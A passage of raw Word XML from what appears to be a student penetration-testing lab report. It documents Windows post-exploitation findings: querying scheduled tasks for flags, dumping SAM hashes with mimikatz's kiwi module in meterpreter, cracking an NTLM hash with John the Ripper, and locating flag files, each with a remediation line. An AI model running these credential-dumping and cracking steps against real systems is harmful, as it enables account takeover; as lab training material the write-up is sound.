                  <wp:extent cx="4657725" cy="774700"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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657725" cy="774700"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1168400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="46"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4657725" cy="1168400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4038600" cy="485775"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="40"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4038600" cy="4857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58">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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025A">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25B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Close port 110</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 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F">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60">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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Task Scheduler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000262">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3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000264">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5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000266">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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Staying in the </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> from flag 4 I ran the command shell to access the schtasks command. I then ran the command schtasks /query to see all the scheduled tasks. This can be used to see if malware has installed a hidden schedule task. I then ran the command schtasks /query /tn “flag5” /fo LIST /v to search for all flag 5 specifications within the scheduled tasks. From there flag5 was revealed within the comment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000268">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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4095750" cy="1266825"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="23"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40957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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="342900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="34"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46577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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1981200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="37"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4657725" cy="19812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6C">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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026E">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26F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Modify permissions to limit access</w:t>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2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 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74">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275">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Password Hash- Kiwi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000276">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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000278">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9">
            <w:pPr>
              <w:widowControl w:val="0"/>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27A">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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">As I continued in the </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">, I ran the command load kiwi to load into mimikatz. From there I ran the help command to list the commands inside of mimikatz. After reviewing and some internet search it was determined that running the command lsa_dump_sam is the best command as this command can see that NTLM hash is extracted from the users. After performing the command I found flag6 as the username and the NTLM hash as 50135ed3bf5e77097409e4a9aa11aa39. I opened a new terminal to create a hash.txt folder using the command touch hash.txt. I confirmed that the file was created by using the command ls. After confirming the file was created I ran the command echo flag6:50135ed3bf5e77097409e4a9aa11aa39 &gt;&gt; hash.txt. This command I put the text into the hash.txt file. I again confirmed that the text went into the hash.txt file by using the command cat hash.txt. And to decipher the Hash NTLM i ran the command john hash.txt –format=NT. This command deciphered the hash inside the file and the command –format=NT tells </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">john</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> the hash type is NTLM. And performing that command gave me flag 6 as the password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027C">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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1574800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="29"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4657725" cy="1574800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2743200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="14"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4657725" cy="2743200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2082800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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4657725" cy="2082800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4229100" cy="1400175"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="6"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229100" cy="1400175"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="3800475" cy="933450"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="20"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800475" cy="933450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1790700"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="12"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6577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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1054100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="39"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465772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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4219575" cy="2266950"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="52"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4219575" cy="226695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80">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1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000282">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283">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Safeguard password hashes by storing them securely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table25"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:topFromText="180" w:bottomFromText="180" w:vertAnchor="text" w:horzAnchor="text" w:tblpX="-13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287">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 7</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000288">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89">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sensitive Data Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028B">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28C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028D">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28E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028F">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290">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Continuing in </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> i ran the command search -f flag*.txt. This command allows you to search the file system by (-f) find by filename, (flag beginning of the file name, (*) any character that follows, (.txt) the file ending in .txt. after performing the command one of the files came back that i was looking for which was c:\Users\Public\Documents\flag7.txt. I used command cd ../(x3) to back out of the directory 3 times to send me to the root of the filesystem. I then ran the command cd :\Users\Public\Documents, ran ls to make sure i was in the correct directory, then ran cat flag7.txt to see the text inside of the file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000291">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292">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="3705225" cy="1943100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="53"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3705225" cy="1943100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="2371725" cy="771525"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="10"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2371725" cy="771525"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2006600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="21"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4657725" cy="20066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93">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294">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000295">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296">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Enforce least privilege access and confirm file systems are clear of confidential data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000297">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add any additional vulnerabilities below.</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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table26"/>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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 8</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="41"/>
                <w:szCs w:val="41"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Findings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9C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029D">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9E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Type (Web app / Linux OS / WIndows OS)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029F">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0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Rating</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A1">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2">
            <w:pPr>
